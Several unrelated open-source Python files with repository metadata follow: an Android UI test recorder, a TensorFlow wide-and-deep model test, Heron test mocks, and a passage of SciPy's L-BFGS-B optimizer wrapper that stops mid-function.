class BaseRecorder(object):
monitor_period = 3 # seconds
def __init__(self, device=None, workdir=".", realtime_analyze=False):
self.device = None
self.device_info = {}
self.running = False
self.setup_workdir(workdir)
if device is not None:
self.attach(device)
self.realtime_analyze = realtime_analyze
self.thread = None
self.frames = [] # for backup
self.last_frame_time = None
self.case_draft = [] # for analyze draft
self.input_queue = Queue.Queue()
self.input_index = 0
# find addons from base classes
self.addons = {}
for cls in self.__class__.__bases__:
name = getattr(cls, '_%s__addon_name' % (cls.__name__,), None)
if name is not None:
gfun = getattr(self, 'get_%s' % (name,))
sfun = getattr(self, 'save_%s' % (name,))
lfun = getattr(self, 'load_%s' % (name,))
self.addons[name] = (gfun, sfun, lfun)
def setup_workdir(self, workdir):
# setup direcoties
self.workdir = workdir
self.casedir = os.path.join(workdir, 'case')
if not os.path.exists(self.casedir):
os.makedirs(self.casedir)
self.framedir = os.path.join(workdir, 'frames')
if not os.path.exists(self.framedir):
os.makedirs(self.framedir)
def update_device_info(self):
if self.device is None:
return
# TODO: define general device info
self.device_info = {}
def start(self):
'''start running in background.'''
self.update_device_info()
self.get_device_status(0) # start addons.
self.hook()
self.thread = threading.Thread(target=self._run)
self.thread.start()
self.running = True
def stop(self):
self.unhook()
self.running = False
self.thread.join()
def get_device_status(self, t):
'''get device status at a given time t (within self.monitor_period)'''
data = {}
for name, (func, _, _) in self.addons.iteritems():
data[name] = func(t)
return data
def _run(self):
while True:
try:
time.sleep(0.1)
frame = self.input_queue.get_nowait()
self.handle_frame(frame)
except Queue.Empty:
if not self.running:
break
except:
traceback.print_exc()
self.running = False
# save meta info for backup & draft.
if not self.realtime_analyze:
self.analyze_all()
self.save()
print 'recorder stopped.'
sys.exit()
def input_event(self, event):
'''should be called when user input events happens (from hook)'''
if not self.running or self.device is None:
return
# print 'input_event', event.time
status = self.get_device_status(event.time)
self.input_index += 1
self.input_queue.put((self.input_index, event, status))
def handle_frame(self, frame):
# print 'handle frame'
idx, event, status = frame
meta = {'index':idx}
meta['event'] = self.serialize_event(event)
if self.last_frame_time is None:
meta['waittime'] = 0
else:
meta['waittime'] = event.time - self.last_frame_time
self.last_frame_time = event.time
# save frames.
# print 'saving...'
eventpath = os.path.join(self.framedir, '%d-event.pkl' % idx)
pickle.dump(event, file(eventpath, 'w'))
meta['status'] = {}
for name, obj in status.iteritems():
func = self.addons[name][1]
data = func(obj, self.framedir, idx)
meta['status'][name] = data
# analyze
if self.realtime_analyze:
self.analyze_frame(idx, event, status, meta['waittime'])
self.frames.append(meta)
def serialize_event(self, event):
return {}
def analyze_frame(self, idx, event, status, waittime):
'''analyze status and generate draft code'''
# Example:
#
# d = {
# 'action' : 'click',
# 'args' : (100, 100),
# 'status' : {
# 'screen' : ('xxxx.png', 'xxx.png'),
# 'screen_orientation' : 0,
# 'uixml' : {'package': 'com.netease.txx', 'class_name' : 'android.widget.EditText', ...}
# },
# 'pyscript' : 'd.click(100, 100)',
# }
#
# self.case_draft.append(d)
pass
def analyze_all(self):
print 'total frames:', len(self.frames)
print 'analying, please wait ...'
for meta in self.frames:
idx = meta['index']
event = pickle.load(file(os.path.join(self.framedir, '%d-event.pkl' % idx)))
status = meta['status']
status = {}
for name, data in meta['status'].iteritems():
if data is None:
status[name] = None
continue
func = self.addons[name][2]
status[name] = func(self.framedir, data)
self.analyze_frame(idx, event, status, meta['waittime'])
@classmethod
def analyze_frames(cls, workdir):
'''generate draft from recorded frames'''
record = cls(None, workdir)
obj = {}
with open(os.path.join(workdir, 'frames', 'frames.json')) as f:
obj = json.load(f)
record.device_info = obj['device']
record.frames = obj['frames']
record.analyze_all()
record.save()
def save(self):
# save frames info, do not overwrite.
filepath = os.path.join(self.framedir, 'frames.json')
if not os.path.exists(filepath):
obj = {
'ctime' : time.ctime(),
'device' : self.device_info,
'frames' : self.frames,
}
with open(filepath, 'w') as f:
json.dump(obj, f, indent=2)
# save draft info
filepath = os.path.join(self.casedir, 'draft.json')
obj = {'skips':[], 'actions': self.case_draft}
with open(filepath, 'w') as f:
json.dump(obj, f, indent=2)
# save draft pyscript
filepath = os.path.join(self.casedir, 'script.py')
content = [
'#-*- encoding: utf-8 -*-', '# Generated by recorder.',
'',
'import time',
'',
'def test(d):',
]
for row in self.case_draft:
script = row['pyscript'].encode('utf-8', 'ignore')
for line in script.split('\n'):
content.append(' '*4 + line)
# content.append(' '*4 + 'time.sleep(1)')
content.extend([
'',
'if __name__ == "__main__":',
' import atx',
' d = atx.connect()',
' test(d)',
])
with open(filepath, 'w') as f:
f.write('\n'.join(content))
def attach(self, device):
'''Attach to device, if current device is not None, should
detach from it first. '''
raise NotImplementedError()
def detach(self):
'''Detach from current device.'''
raise NotImplementedError()
def hook(self):
'''Hook user input.'''
raise NotImplementedError()
def unhook(self):
'''Unhook user input.'''
raise NotImplementedError()
# Base tuple type: (capture timestamp, image payload).
__CaptureRecord = namedtuple('__CaptureRecord', ('ctime', 'image'))
class CaptureRecord(__CaptureRecord):
    """Capture sample ordered and compared by timestamp only, so a
    cache of records can be bisected against a bare (time, None)
    tuple while the image payload is ignored."""
    # NOTE: the right-hand operand may be a plain tuple (bisect probes
    # with (t, None)), so index it rather than using .ctime.
    def __eq__(self, other):
        return self.ctime == other[0]
    def __ne__(self, other):
        return self.ctime != other[0]
    def __gt__(self, other):
        return self.ctime > other[0]
    def __ge__(self, other):
        return self.ctime >= other[0]
    def __lt__(self, other):
        return self.ctime < other[0]
    def __le__(self, other):
        return self.ctime <= other[0]
class ScreenAddon(object):
__addon_name = 'screen'
__capture_cache = []
__capture_interval = 0.1
__capture_lock = None
__capture_thread = None
def get_screen(self, t):
if self.__capture_thread is None:
self.__start()
with self.__capture_lock:
idx = bisect.bisect(self.__capture_cache, (t, None))
if idx != 0:
return self.__capture_cache[idx-1][1]
def save_screen(self, screen, dirpath, idx):
if screen is None:
return
filename = '%d.png' % idx
filepath = os.path.join(dirpath, filename)
cv2.imwrite(filepath, screen)
return filename
def load_screen(self, dirpath, filename):
filepath = os.path.join(dirpath, filename)
try:
return cv2.imread(filepath)
except:
return
def __start(self):
print 'start', self.__addon_name
if self.__capture_lock is None:
self.__capture_lock = threading.Lock()
if self.__capture_thread is not None:
self.__capture_thread._Thread_stop() # using __stop private method, not good
self.__capture_thread = t = threading.Thread(target=self.__capture)
t.setDaemon(True)
t.start()
def __capture(self):
capture_maxnum = int(self.monitor_period/self.__capture_interval)
while True:
self.__capture_lock.acquire()
try:
time.sleep(self.__capture_interval)
if not self.running or self.device is None:
continue
# tic = time.time()
img = self.device.screenshot_cv2()
# print '--capturing.. cost', time.time() - tic
self.__capture_cache.append(CaptureRecord(time.time(), img))
self.__capture_cache = self.__capture_cache[-capture_maxnum:]
finally:
self.__capture_lock.release()
class UixmlAddon(object):
__addon_name = 'uixml'
__uidump_cache = []
__uidump_interval = 0.1
__uidump_lock = None
__uidump_thread = None
def get_uixml(self, t):
if self.__uidump_thread is None:
self.__start()
with self.__uidump_lock:
idx = bisect.bisect(self.__uidump_cache, (t, ''))
if idx != 0:
return self.__uidump_cache[idx-1][1]
def save_uixml(self, uixml, dirpath, idx):
if uixml is None:
return
filename = '%d-uidump.xml' % idx
filepath = os.path.join(dirpath, filename)
with open(filepath, 'w') as f:
f.write(uixml)
return filename
def load_uixml(self, dirpath, filename):
filepath = os.path.join(dirpath, filename)
try:
return open(filepath).read()
except IOError:
return u''
def __start(self):
print 'start', self.__addon_name
if self.__uidump_lock is None:
self.__uidump_lock = threading.Lock()
if self.__uidump_thread is not None:
self.__uidump_thread._Thread_stop() # using __stop private method, not good
self.__uidump_thread = t = threading.Thread(target=self.__dump)
t.setDaemon(True)
t.start()
def __dump(self):
uidump_maxnum = int(self.monitor_period/self.__uidump_interval)
while True:
self.__uidump_lock.acquire()
try:
time.sleep(self.__uidump_interval)
if not self.running or self.device is None:
continue
# tic = time.time()
xmldata = self.device.dumpui()
xmldata = xmldata.encode('utf-8')
# print 'dumping ui.. cost', time.time() - tic
self.__uidump_cache.append((time.time(), xmldata))
self.__uidump_cache = self.__uidump_cache[-uidump_maxnum:]
finally:
self.__uidump_lock.release()
if __name__ == '__main__':
    # Smoke test: drive the recorder with dummy device/event stubs,
    # feeding one synthetic input event per second for ~10 seconds.
    class TestRecorder(BaseRecorder, ScreenAddon, UixmlAddon):
        def attach(self, device):
            self.device = device
        def detach(self): pass
        def hook(self): pass
        def unhook(self): pass
    class DummyDevice(object):
        # Minimal device stub satisfying the addon capture threads.
        def screenshot_cv2(self):
            return None
        def dumpui(self):
            return u'uixml'
    class DummyEvent(object):
        # Event stub: only a timestamp is required by the recorder.
        def __init__(self):
            self.time = time.time()
    r = TestRecorder(DummyDevice(), 'testcase')
    r.start()
    count = 10
    while count > 0:
        try:
            time.sleep(1)
            e = DummyEvent()
            r.input_event(e)
        except:
            break
        count -= 1
    r.stop()
|
{
"content_hash": "7d36e9018d350fbe1440db17f205cf00",
"timestamp": "",
"source": "github",
"line_count": 414,
"max_line_length": 106,
"avg_line_length": 32.44202898550725,
"alnum_prop": 0.5090462363189636,
"repo_name": "Andy-hpliu/AirtestX",
"id": "ac51fb33e2f7418596dc84c22004aa6b449a8210",
"size": "13457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atx/record/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "230"
},
{
"name": "CSS",
"bytes": "34684"
},
{
"name": "Go",
"bytes": "13043"
},
{
"name": "HTML",
"bytes": "28019"
},
{
"name": "JavaScript",
"bytes": "300119"
},
{
"name": "Makefile",
"bytes": "348"
},
{
"name": "Protocol Buffer",
"bytes": "5495"
},
{
"name": "Python",
"bytes": "394333"
},
{
"name": "Shell",
"bytes": "4162"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
import wide_deep
# Silence TF info/warning logs during tests.
tf.logging.set_verbosity(tf.logging.ERROR)
# One CSV row in the census-income schema consumed by
# wide_deep.input_fn (label '<=50K' in the last column).
TEST_INPUT = ('18,Self-emp-not-inc,987,Bachelors,12,Married-civ-spouse,abc,'
              'Husband,zyx,wvu,34,56,78,tsr,<=50K')
# Expected parsed feature values for TEST_INPUT (only the columns the
# test inspects).
TEST_INPUT_VALUES = {
    'age': 18,
    'education_num': 12,
    'capital_gain': 34,
    'capital_loss': 56,
    'hours_per_week': 78,
    'education': 'Bachelors',
    'marital_status': 'Married-civ-spouse',
    'relationship': 'Husband',
    'workclass': 'Self-emp-not-inc',
    'occupation': 'abc',
}
# Multi-row fixture checked into the repo next to this test.
TEST_CSV = os.path.join(os.path.dirname(__file__), 'wide_deep_test.csv')
class BaseTest(tf.test.TestCase):
  """Tests for the wide & deep input pipeline and estimator."""

  def setUp(self):
    # Write a single-row CSV fixture into the test's temp directory.
    self.temp_dir = self.get_temp_dir()
    self.input_csv = os.path.join(self.temp_dir, 'test.csv')
    with tf.gfile.Open(self.input_csv, 'w') as fixture:
      fixture.write(TEST_INPUT)

  def test_input_fn(self):
    features, labels = wide_deep.input_fn(self.input_csv, 1, False, 1)()
    with tf.Session() as sess:
      features, labels = sess.run((features, labels))
    # Every expected column must be present with exactly one value.
    for key in TEST_INPUT_VALUES:
      self.assertTrue(key in features)
      self.assertEqual(len(features[key]), 1)
      value = features[key][0]
      if isinstance(value, bytes):
        # Python 3 yields bytes for string features; normalize.
        value = value.decode()
      self.assertEqual(TEST_INPUT_VALUES[key], value)
    self.assertFalse(labels)

  def build_and_test_estimator(self, model_type):
    """Ensure that model trains and minimizes loss."""
    estimator = wide_deep.build_estimator(self.temp_dir, model_type)
    # A single training step initializes the model; evaluate to get a
    # baseline loss.
    estimator.train(
        input_fn=wide_deep.input_fn(
            TEST_CSV, num_epochs=1, shuffle=True, batch_size=1),
        steps=1)
    baseline = estimator.evaluate(
        input_fn=wide_deep.input_fn(
            TEST_CSV, num_epochs=1, shuffle=False, batch_size=1))
    # Train for 40 steps at batch size 2, then evaluate again.
    estimator.train(
        input_fn=wide_deep.input_fn(
            TEST_CSV, num_epochs=None, shuffle=True, batch_size=2),
        steps=40)
    trained = estimator.evaluate(
        input_fn=wide_deep.input_fn(
            TEST_CSV, num_epochs=1, shuffle=False, batch_size=1))
    print('%s initial results:' % model_type, baseline)
    print('%s final results:' % model_type, trained)
    self.assertLess(trained['loss'], baseline['loss'])

  def test_wide_deep_estimator_training(self):
    self.build_and_test_estimator('wide_deep')
if __name__ == '__main__':
  # Delegate test discovery/running to TensorFlow's test runner.
  tf.test.main()
|
{
"content_hash": "8481348292d1875797aa524c7cd5e109",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 76,
"avg_line_length": 31.054945054945055,
"alnum_prop": 0.6493276716206653,
"repo_name": "zlpmichelle/crackingtensorflow",
"id": "55fa00fa6cc00dee724ce376b78440163a19e205",
"size": "3516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wide_deep/wide_deep_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1109569"
},
{
"name": "Python",
"bytes": "583902"
},
{
"name": "Shell",
"bytes": "111"
}
],
"symlink_target": ""
}
|
"""mock_generator.py: module for creating mock objects for unittesting
mainly for common/tests/python/utils"""
# pylint: disable=unused-argument
# pylint: disable=missing-docstring
import random
from mock import patch
from heronpy.api.task_hook import ITaskHook
from heronpy.api.custom_grouping import ICustomGrouping
from heronpy.api.serializer import PythonSerializer
from heron.instance.src.python.utils.metrics import MetricsCollector
from heron.instance.src.python.utils.misc import (OutgoingTupleHelper, PhysicalPlanHelper,
HeronCommunicator)
from heron.proto import tuple_pb2
import heron.instance.src.python.utils.system_constants as constants
import heron.instance.tests.python.mock_protobuf as mock_protobuf
# Assorted primitive and container values used by tests to exercise
# serialization round-trips.
prim_list = [1000, -234, 0.00023, "string",
             ["abc", "def", "ghi"], True, False,
             ("tuple", 123, True), None, {}]
# Returns legit looking topology
def get_a_sample_pplan():
  """Returns a legitimate looking physical plan
  This topology has 1 spout and 2 bolts. Currently no input/output streams.
  There is only one stream manager.
  [Instance 1: spout1]
  - instance_id = "instance1"
  - task_id = 100
  - component_index = 0
  - component_name = "spout1"
  [Instance 2: bolt1]
  - instance_id = "instance2"
  - task_id = 200
  - component_index = 0
  - component_name = "bolt1"
  [instance 3: bolt2]
  - instance_id = "instance3"
  - task_id = 300
  - component_index = 0
  - component_name = "bolt2"
  :returns: PhysicalPlan message and a list of dictionaries for each instance containing
            (instance_id, task_id, comp_index, comp_name)
  """
  spout_1 = mock_protobuf.get_mock_spout(component=mock_protobuf.get_mock_component(name="spout1"))
  bolt_1 = mock_protobuf.get_mock_bolt(component=mock_protobuf.get_mock_component(name="bolt1"))
  bolt_2 = mock_protobuf.get_mock_bolt(component=mock_protobuf.get_mock_component(name="bolt2"))
  topology = mock_protobuf.get_mock_topology(spouts=[spout_1], bolts=[bolt_1, bolt_2])
  # Fixed typo: the third id was "instancer3", contradicting the
  # docstring above (instance_id = "instance3").
  instance_ids = ["instance1", "instance2", "instance3"]
  task_ids = [100, 200, 300]
  comp_indexes = [0, 0, 0]
  comp_names = ["spout1", "bolt1", "bolt2"]
  instances = []
  for i_id, t_id, c_i, c_name in zip(instance_ids, task_ids, comp_indexes, comp_names):
    info = mock_protobuf.get_mock_instance_info(task_id=t_id,
                                                component_index=c_i,
                                                component_name=c_name)
    instance = mock_protobuf.get_mock_instance(instance_id=i_id, info=info)
    instances.append(instance)
  pplan = mock_protobuf.get_mock_pplan(topology=topology, instances=instances)
  keys = ["instance_id", "task_id", "comp_index", "comp_name"]
  zipped = zip(instance_ids, task_ids, comp_indexes, comp_names)
  return pplan, [dict(zip(keys, z)) for z in zipped]
def make_data_tuple_from_list(lst, serializer=PythonSerializer()):
  """Make HeronDataTuple from a list of objects

  Returns a (HeronDataTuple, total_serialized_size_in_bytes) pair.
  """
  data_tuple = tuple_pb2.HeronDataTuple()
  data_tuple.key = 0
  total_size = 0
  for item in lst:
    # Serialize each value and track the accumulated payload size.
    blob = serializer.serialize(item)
    data_tuple.values.append(blob)
    total_size += len(blob)
  return data_tuple, total_size
class MockOutgoingTupleHelper(OutgoingTupleHelper):
  """Creates a mock OutgoingTupleHelper class, for unittesting"""
  # Construction mode: build from a sample successful physical plan.
  SAMPLE_SUCCESS = 0
  def __init__(self, mode=SAMPLE_SUCCESS):
    # Flags recording whether the base-class tuple initializers ran;
    # tests assert on these.
    self.called_init_new_data = False
    self.called_init_new_control = False
    sample_sys_config = {constants.INSTANCE_SET_DATA_TUPLE_CAPACITY: 1000,
                         constants.INSTANCE_SET_DATA_TUPLE_SIZE_BYTES: 2000,
                         constants.INSTANCE_SET_CONTROL_TUPLE_CAPACITY: 3000}
    if mode == MockOutgoingTupleHelper.SAMPLE_SUCCESS:
      pplan_helper, out_stream = self._prepare_sample_success()
      # Patch the system-config lookup so the base __init__ reads the
      # mock capacities above instead of real system configuration.
      with patch("heron.instance.src.python.utils.system_config.get_sys_config",
                 side_effect=lambda: sample_sys_config):
        super(MockOutgoingTupleHelper, self).__init__(pplan_helper, out_stream)
  @staticmethod
  def _prepare_sample_success():
    # Build a helper/out-stream pair from the sample physical plan,
    # using the first instance (the spout) as "this" instance.
    pplan, instances = get_a_sample_pplan()
    pplan_helper = PhysicalPlanHelper(pplan, instances[0]["instance_id"], "topology.pex.path")
    out_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
    return pplan_helper, out_stream
  def _init_new_data_tuple(self, stream_id):
    # Record the call, then delegate to the real implementation.
    self.called_init_new_data = True
    OutgoingTupleHelper._init_new_data_tuple(self, stream_id)
  def _init_new_control_tuple(self):
    # Record the call, then delegate to the real implementation.
    self.called_init_new_control = True
    OutgoingTupleHelper._init_new_control_tuple(self)
class MockMetricsCollector(MetricsCollector):
  """Creates a mock MetricsCollector class, for unittesting.

  Records requested timer buckets in ``registered_timers`` instead of
  scheduling real timer tasks.
  """
  def __init__(self):
    # Initialised before super().__init__ in case the parent constructor
    # registers timer tasks during construction -- TODO confirm.
    self.registered_timers = []
    super(MockMetricsCollector, self).__init__(None, HeronCommunicator())
  def _register_timer_task(self, time_bucket_in_sec):
    # Record the bucket rather than arming a real timer.
    self.registered_timers.append(time_bucket_in_sec)
class MockCustomGrouping(ICustomGrouping):
  """Mock ICustomGrouping whose task-selection strategy is chosen by ``mode``.

  The two WRONG_* modes deliberately misbehave so tests can exercise the
  framework's error handling.
  """
  ALL_TARGET_MODE = 0  # returns the whole list of target tasks
  RANDOM_TARGET_MODE = 1  # returns a random subset of the target tasks
  WRONG_RETURN_TYPE_MODE = 2  # deliberately returns a non-list value
  WRONG_CHOOSE_TASK_MODE = 3  # deliberately returns ids outside target_tasks
  def __init__(self, mode):
    super(MockCustomGrouping, self).__init__()
    self.mode = mode
  def prepare(self, context, component, stream, target_tasks):
    # Remember the candidate tasks for later choose_tasks() calls.
    self.target_tasks = target_tasks
  def choose_tasks(self, values):
    if self.mode == self.ALL_TARGET_MODE:
      return self.target_tasks
    if self.mode == self.RANDOM_TARGET_MODE:
      # Keep each target task with probability 1/2.
      return [candidate for candidate in self.target_tasks
              if random.getrandbits(1)]
    if self.mode == self.WRONG_RETURN_TYPE_MODE:
      return 'string'
    if self.mode == self.WRONG_CHOOSE_TASK_MODE:
      # Collect five distinct task ids that are NOT valid targets.
      bogus = []
      while len(bogus) < 5:
        candidate = random.randint(1, 1000)
        if candidate not in self.target_tasks and candidate not in bogus:
          bogus.append(candidate)
      return bogus
class MockTaskHook(ITaskHook):
  """Mock ITaskHook that records which of its callbacks have fired."""
  def prepare(self, conf, context):
    # Reset every "was this hook called?" flag to False.
    for flag in ('clean_up_called', 'emit_called',
                 'spout_ack_called', 'spout_fail_called',
                 'bolt_exec_called', 'bolt_ack_called', 'bolt_fail_called'):
      setattr(self, flag, False)
  def emit(self, emit_info):
    self.emit_called = True
  def spout_ack(self, spout_ack_info):
    self.spout_ack_called = True
  def spout_fail(self, spout_fail_info):
    self.spout_fail_called = True
  def bolt_execute(self, bolt_execute_info):
    self.bolt_exec_called = True
  def bolt_ack(self, bolt_ack_info):
    self.bolt_ack_called = True
  def bolt_fail(self, bolt_fail_info):
    self.bolt_fail_called = True
|
{
"content_hash": "87a920c80216afd12f5def20cf2d2a0a",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 99,
"avg_line_length": 35.930851063829785,
"alnum_prop": 0.6786084381939305,
"repo_name": "lucperkins/heron",
"id": "e727acaa1f48762adbffd09d82b7a9b7e93cb255",
"size": "7396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heron/instance/tests/python/utils/mock_generator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11709"
},
{
"name": "C++",
"bytes": "1623239"
},
{
"name": "CSS",
"bytes": "109554"
},
{
"name": "HCL",
"bytes": "2115"
},
{
"name": "HTML",
"bytes": "156820"
},
{
"name": "Java",
"bytes": "4466689"
},
{
"name": "JavaScript",
"bytes": "1110981"
},
{
"name": "M4",
"bytes": "17941"
},
{
"name": "Makefile",
"bytes": "1046"
},
{
"name": "Objective-C",
"bytes": "1929"
},
{
"name": "Python",
"bytes": "1537910"
},
{
"name": "Ruby",
"bytes": "1930"
},
{
"name": "Scala",
"bytes": "72781"
},
{
"name": "Shell",
"bytes": "166876"
},
{
"name": "Smarty",
"bytes": "528"
},
{
"name": "Thrift",
"bytes": "915"
}
],
"symlink_target": ""
}
|
"""
Functions
---------
.. autosummary::
:toctree: generated/
fmin_l_bfgs_b
"""
## License for the Python wrapper
## ==============================
## Copyright (c) 2004 David M. Cooke <cookedm@physics.mcmaster.ca>
## Permission is hereby granted, free of charge, to any person obtaining a
## copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
## DEALINGS IN THE SOFTWARE.
## Modifications by Travis Oliphant and Enthought, Inc. for inclusion in SciPy
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import array, asarray, float64, int32, zeros
from . import _lbfgsb
from .optimize import (MemoizeJac, OptimizeResult,
_check_unknown_options, wrap_function,
_approx_fprime_helper)
from scipy.sparse.linalg import LinearOperator
__all__ = ['fmin_l_bfgs_b', 'LbfgsInvHessProduct']
def fmin_l_bfgs_b(func, x0, fprime=None, args=(),
                  approx_grad=0,
                  bounds=None, m=10, factr=1e7, pgtol=1e-5,
                  epsilon=1e-8,
                  iprint=-1, maxfun=15000, maxiter=15000, disp=None,
                  callback=None, maxls=20):
    """
    Minimize a function func using the L-BFGS-B algorithm.

    Parameters
    ----------
    func : callable f(x,*args)
        Function to minimise. If `approx_grad` is True it returns only
        ``f``; if `fprime` is None it must return ``f, g = func(x, *args)``.
    x0 : ndarray
        Initial guess.
    fprime : callable fprime(x,*args), optional
        The gradient of `func`.
    args : sequence, optional
        Arguments to pass to `func` and `fprime`.
    approx_grad : bool, optional
        Whether to approximate the gradient numerically (in which case
        `func` returns only the function value).
    bounds : list, optional
        ``(min, max)`` pairs for each element in ``x``. Use None or
        +-inf for an unbounded side.
    m : int, optional
        The maximum number of variable metric corrections kept by the
        limited memory approximation of the Hessian.
    factr : float, optional
        The iteration stops when
        ``(f^k - f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``, where
        ``eps`` is the machine precision. Typical values: 1e12 (low
        accuracy), 1e7 (moderate), 10.0 (extremely high). Related to the
        `ftol` exposed by `scipy.optimize.minimize` via
        ``ftol = factr * numpy.finfo(float).eps``.
    pgtol : float, optional
        Stop when ``max{|proj g_i | i = 1, ..., n} <= pgtol``, where
        ``pg_i`` is the i-th component of the projected gradient.
    epsilon : float, optional
        Step size used when `approx_grad` is True.
    iprint : int, optional
        Controls the frequency of output; ``iprint < 0`` means no output.
    disp : int, optional
        If not None, overrides `iprint` (zero means no output).
    maxfun : int, optional
        Maximum number of function evaluations.
    maxiter : int, optional
        Maximum number of iterations.
    callback : callable, optional
        Called after each iteration, as ``callback(xk)``.
    maxls : int, optional
        Maximum number of line search steps (per iteration). Default is 20.

    Returns
    -------
    x : array_like
        Estimated position of the minimum.
    f : float
        Value of `func` at the minimum.
    d : dict
        Information dictionary: ``d['warnflag']`` is 0 if converged, 1 if
        too many function evaluations or iterations, 2 if stopped for
        another reason (given in ``d['task']``); ``d['grad']`` is the
        gradient at the minimum; ``d['funcalls']`` the number of function
        calls; ``d['nit']`` the number of iterations.

    See also
    --------
    minimize : Interface to minimization algorithms for multivariate
        functions; see the 'L-BFGS-B' `method` (which takes `ftol`
        rather than `factr`).
    """
    # Decide which callable supplies f and which supplies the gradient.
    if approx_grad:
        fun, jac = func, None           # gradient approximated numerically
    elif fprime is None:
        fun = MemoizeJac(func)          # func returns (f, g); split and cache
        jac = fun.derivative
    else:
        fun, jac = func, fprime

    # `disp`, when supplied, takes precedence over `iprint`.
    opts = {'disp': iprint if disp is None else disp,
            'iprint': iprint,
            'maxcor': m,
            # The modern interface speaks ftol; translate from factr.
            'ftol': factr * np.finfo(float).eps,
            'gtol': pgtol,
            'eps': epsilon,
            'maxfun': maxfun,
            'maxiter': maxiter,
            'callback': callback,
            'maxls': maxls}

    res = _minimize_lbfgsb(fun, x0, args=args, jac=jac, bounds=bounds,
                           **opts)

    # Repackage the OptimizeResult into the legacy (x, f, d) triple.
    info = {'grad': res['jac'],
            'task': res['message'],
            'funcalls': res['nfev'],
            'nit': res['nit'],
            'warnflag': res['status']}
    return res['x'], res['fun'], info
def _minimize_lbfgsb(fun, x0, args=(), jac=None, bounds=None,
                     disp=None, maxcor=10, ftol=2.2204460492503131e-09,
                     gtol=1e-5, eps=1e-8, maxfun=15000, maxiter=15000,
                     iprint=-1, callback=None, maxls=20, **unknown_options):
    """
    Minimize a scalar function of one or more variables using the L-BFGS-B
    algorithm.

    Options
    -------
    disp : None or int
        If `disp is None` (the default), then the supplied version of `iprint`
        is used. If `disp is not None`, then it overrides the supplied version
        of `iprint` with the behaviour you outlined.
    maxcor : int
        The maximum number of variable metric corrections used to
        define the limited memory matrix. (The limited memory BFGS
        method does not store the full hessian but uses this many terms
        in an approximation to it.)
    ftol : float
        The iteration stops when ``(f^k -
        f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= ftol``.
    gtol : float
        The iteration will stop when ``max{|proj g_i | i = 1, ..., n}
        <= gtol`` where ``pg_i`` is the i-th component of the
        projected gradient.
    eps : float
        Step size used for numerical approximation of the jacobian.
    maxfun : int
        Maximum number of function evaluations.
    maxiter : int
        Maximum number of iterations.
    maxls : int, optional
        Maximum number of line search steps (per iteration). Default is 20.

    Notes
    -----
    The option `ftol` is exposed via the `scipy.optimize.minimize` interface,
    but calling `scipy.optimize.fmin_l_bfgs_b` directly exposes `factr`. The
    relationship between the two is ``ftol = factr * numpy.finfo(float).eps``.
    I.e., `factr` multiplies the default machine floating-point precision to
    arrive at `ftol`.
    """
    _check_unknown_options(unknown_options)
    # Translate this interface's option names to the Fortran driver's names.
    m = maxcor
    epsilon = eps
    pgtol = gtol
    # The Fortran routine wants factr; invert ftol = factr * eps.
    factr = ftol / np.finfo(float).eps

    x0 = asarray(x0).ravel()
    n, = x0.shape

    if bounds is None:
        bounds = [(None, None)] * n
    if len(bounds) != n:
        raise ValueError('length of x0 != length of bounds')
    # unbounded variables must use None, not +-inf, for optimizer to work properly
    bounds = [(None if l == -np.inf else l, None if u == np.inf else u) for l, u in bounds]

    if disp is not None:
        if disp == 0:
            iprint = -1
        else:
            iprint = disp

    # wrap_function counts calls in n_function_evals[0] (used against maxfun).
    n_function_evals, fun = wrap_function(fun, ())
    if jac is None:
        def func_and_grad(x):
            # No gradient supplied: finite-difference approximation.
            f = fun(x, *args)
            g = _approx_fprime_helper(x, fun, epsilon, args=args, f0=f)
            return f, g
    else:
        def func_and_grad(x):
            f = fun(x, *args)
            g = jac(x, *args)
            return f, g

    # nbd encodes each variable's bound type for the Fortran code:
    # 0 = unbounded, 1 = lower only, 2 = both, 3 = upper only.
    nbd = zeros(n, int32)
    low_bnd = zeros(n, float64)
    upper_bnd = zeros(n, float64)
    bounds_map = {(None, None): 0,
                  (1, None): 1,
                  (1, 1): 2,
                  (None, 1): 3}
    for i in range(0, n):
        l, u = bounds[i]
        if l is not None:
            low_bnd[i] = l
            l = 1
        if u is not None:
            upper_bnd[i] = u
            u = 1
        nbd[i] = bounds_map[l, u]

    if not maxls > 0:
        raise ValueError('maxls must be positive.')

    # Workspace and state arrays with the sizes the setulb interface expects.
    x = array(x0, float64)
    f = array(0.0, float64)
    g = zeros((n,), float64)
    wa = zeros(2*m*n + 5*n + 11*m*m + 8*m, float64)
    iwa = zeros(3*n, int32)
    task = zeros(1, 'S60')
    csave = zeros(1, 'S60')
    lsave = zeros(4, int32)
    isave = zeros(44, int32)
    dsave = zeros(29, float64)

    task[:] = 'START'

    n_iterations = 0

